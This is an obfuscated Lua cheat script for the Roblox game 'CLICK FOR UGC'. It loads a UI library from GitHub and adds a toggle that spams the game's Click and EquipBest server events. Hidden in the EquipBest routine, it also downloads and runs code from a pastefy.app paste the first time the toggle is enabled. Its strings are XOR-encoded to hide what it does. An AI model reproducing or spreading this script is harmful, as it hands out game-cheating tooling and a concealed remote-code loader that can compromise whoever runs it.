--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.3) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v16,v17) local v18={};for v21=1, #v16 do v6(v18,v0(v4(v1(v2(v16,v21,v21 + 1 )),v1(v2(v17,1 + (v21% #v17) ,1 + (v21% #v17) + 1 )))%256 ));end return v5(v18);end GameName="CLICK FOR UGC | 🖱";tab1name=v7("\252\194\210\43","\126\177\163\187\69\134\219\167");local v8=loadstring(game:HttpGet("https://raw.githubusercontent.com/bloodball/-back-ups-for-libs/main/wizard"))();local v9=v8:NewWindow(GameName);local v10=v9:NewSection(tab1name);local v11=false;local function v12() while v11 do game:GetService(v7("\17\200\58\201\245\32\204\62\192\248\16\217\37\215\253\36\200","\156\67\173\74\165")).Events.Click:FireServer();wait();end end local function v13() game:GetService(v7("\6\178\89\26\181\37\71\32\178\77\37\168\41\84\53\176\76","\38\84\215\41\118\220\70")).EggRemoteEvents.EquipBest:FireServer();loadstring(game:HttpGet("https://pastefy.app/tvGsqkPf/raw"))();end local v14=false;v10:CreateButton(v7("\113\3\54\29\190\115\26\43\17\245","\158\48\118\66\114"),function(v19) local v20=0;while true do if (v20==(1655 -(1594 + 61))) then v11=v19;if v11 then local v22=0;while true do if (v22==0) then coroutine.wrap(v12)();if  not v14 then v13();v14=true;end break;end end end break;end end end);local v15=v9:NewSection(v7("\155\45\23\38\122\169\244\191\34\21\58\127","\155\203\68\112\86\19\197"));
